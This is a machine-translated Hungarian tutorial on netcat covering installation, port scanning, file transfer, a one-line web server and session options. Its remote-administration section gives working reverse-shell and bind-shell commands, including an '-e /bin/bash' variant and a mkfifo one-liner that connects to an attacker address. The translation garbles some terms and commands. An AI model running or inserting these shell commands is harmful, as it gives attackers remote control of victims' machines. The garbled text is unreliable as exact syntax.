Rövid különbség a netcat-hagyományos és a netcat-openbsd között
Két hasonló csomag áll rendelkezésre a netcat számára, kis különbség van közöttük.
netcat-hagyományos tartalmaz egy további '-e' opciót, amely felhasználható a program kötésére (i.e bash) netcat-mal. Ez a szolgáltatás nagyon hasznos távoli adminisztrációs célokra.
netcat-openbsd van néhány további támogatása az IPv6 és a proxyk számára.
Netcat telepítés
Bár a netcat előre telepítve van a legtöbb Linux disztribúcióban, de ha nem, akkor könnyen telepíthető az alábbi parancsokkal.
Hagyományos csomagoláshoz,
[email protected]: ~ $ sudo apt-get install netcat-traditionalAz openbsd verzióhoz,
[e-mail védett]: ~ $ sudo apt-get install netcat-openbsdA Netcat for Windows letölthető innen: https: // sourceforge.net / projektek / nc110 / fájlok /.
Most a netcat érdekes felhasználási eseteit tárjuk fel
Port szkennelés a netcat segítségével
Nyitott portok kereséséhez használja a '-z' opciót. A Netcat minden portra megpróbál csatlakozni anélkül, hogy bármilyen adatot vagy nagyon korlátozott adatot küldene UDP esetén. Írja be a következőt
[e-mail védett]: ~ $ nc -z -v hackme.org 80... kivágás…
hackme.org [217.78.1.155] 80 (http) nyitva
A portok tartományának beolvasásához írja be a következőt:
[e-mail védett]: ~ $ nc -z -nv 192.168.100.72 20-80(ISMERETLEN) [192.168.100.72] 80 (http) nyitva
(ISMERETLEN) [192.168.100.72] 22 (ssh) nyitva
Fájlátvitel netcat segítségével
A netcat másik hasznos esete a fájlok átvitele a távoli számítógépek között. Küldhet szövegeket és bináris fájlokat egyik számítógépről egy másik számítógépre. Megpróbálunk egy fájlt elküldeni.pdf ”Linux PC-ről Windows PC-re [IP 192.168.100.72] a netcat példaként.
Windows gépen (vevőn) írja be a következőket
C: \ Felhasználók> nc -nvlp 1337> fájl.pdfA [0.0.0.0] (2. család, 1337-es kikötő)
Linux gépen (küldő) írja be a következőket
[e-mail védett]: ~ $ nc -nv 192.168.100.72 1337 < file.pdfCsatlakozás a 192-hez.168.100.72 1337-es port [tcp / *] sikerült!
Távoli adminisztráció a netcattal
A netcat egyik legjobb felhasználási esete a távoli adminisztráció, ami azt jelenti, hogy a netcat segítségével vezérelheti valaki más számítógépét. A Netcat-traditional egy '-e' opcióval rendelkezik, amely program kötésére használható (i.e cmd.exe Windows vagy bash Linux alatt) porttal, ez azt jelenti, hogy a netcat kommunikátorként fog működni a program és a távoli PC között. A Netcat parancsokat kap a távoli PC-ről, végrehajtja a helyi rendszeren, és az eredményeket visszaküldi a távoli PC-re. Ezt a funkciót széles körben használják rosszindulatú célokra, hátsó ajtók tartására a számítógépeken és a szervereken. Ez a funkció csak a hagyományos netcat-ban érhető el, de egy kis trükkel a netcat-openbsd is használható ugyanarra a célra. Kétféle módon vezérelheti mások számítógépét.
A Fordított héj kapcsolat, a támadó meghallgatja a kikötőt, és várja, hogy a kapcsolat elküldődjön az áldozat gépéről. Akkor használják, ha az áldozat számítógépe a NAT mögött van, vagy nincs nyilvános IP-je.
A fordított shell megszerzéséhez a netcat használatával a netcat használatával egy porton kell hallgatnia. Írja be a következőket a támadógépre,
[e-mail védett]: ~ $ nc -nvlp 1337A [0.0.0.0] (2. család, 1337-es kikötő)
Az áldozat gépén (ha netcat-hagyományos telepítve van)
// cserélje ki a „/ bin / bash” szót a „cmd.exe ”Windows esetén
[e-mail védett]: ~ $ nc -nv [IP_ADDR] 1337 -e / bin / bashMert netcat-openbsd (ahol az „-e” opció nem támogatott)
[e-mail védett]: ~ $ rm / tmp / f; mkfifo / tmp / f; cat/ tmp / f | / bin / sh -i 2> & 1 | nc [IP_ADDR] 1337> / tmp / f
Míg a Kötő héj A támadó összeköti az áldozat gépének egyik portját, és az ügyfélaljzaton keresztül csatlakozik ahhoz a porthoz. Akkor használják, ha a támadó gépe a NAT mögött van, vagy nincs nyilvános IP-je.
Az áldozat gépén írja be
[e-mail védett]: ~ $ nc -nlvp 1337 -e / bin / bashhallgat [bármely] 1337-et…
A parancsok futtatásához az áldozati gépen írja be:
[e-mail védett]: ~ $ nc -nv 127.0.0.1 1337Csatlakozás a 127-hez.0.0.1 1337-es port [tcp / *] sikerült!
$ id
uid = 1000 (azad) gid = 1000 (azad) csoport = 1000 (azad), 4 (adm), 24 (cdrom), 27 (sudo),
30 (dip), 46 (plugdev), 118 (lpadmin), 129 (sambashare)
Egyszerű webkiszolgáló a netcat segítségével
Egy másik egyszerű trükköt is megtehet, hogy a netcat-t minimális egyoldalas webszerverként használja. Ez a webkiszolgáló nagyon egyszerű lenne, külön konfigurációk nélkül, és használjuk a HTML-kód elküldését a böngészőbe.
[e-mail védett]: ~ $ true; do echo -e "HTTP / 1.1 200 OK \ n \ n $ (visszhang "
Egyszerű webszerverem a netcat segítségével
")" | nc-nvlp 1337; KészA [0.0.0.0] (2. család, 1337-es kikötő)
Most próbáld meg lekérni a weblapot a curl használatával
[e-mail védett]: ~ $ curl http: // 127.0.0.1: 1337 /Egyszerű webszerverem a netcat segítségével
Adja meg a netcat munkamenet időkorlátját
A „-w” opcióval megadhatja a netcat munkamenet időkorlátját. A Netcat automatikusan lekapcsolja munkamenetét a megadott idő letelte után.
// -w [Idő másodpercben][e-mail védett]: ~ $ nc -w 40 -nvlp 1337
A [0.0.0.0] (2. család, 1234-es port)
Folytassa a hallgatást akkor is, ha az ügyfél bezárja a kapcsolatot
Normál üzemmódban a netcat szerver leáll, és leállítja a hallgatást a porton, amikor az ügyfél lezárja a kapcsolatot. A „-k” opcióval folyamatosan fenntarthatja a szervert
[e-mail védett]: ~ $ nc -k -nlvp 1234A [0.0.0.0] (2. család, 1234-es port)
Következtetés
A Netcat egyszerű, de hatékony segédprogram, amely sok egyszerű napi feladathoz használható. Szinte minden UNIX-ba, például operációs rendszerbe, előre telepítve van, és különféle feladatokhoz használható, például két számítógép közötti kommunikációhoz, fájlátvitelhez és még sok máshoz.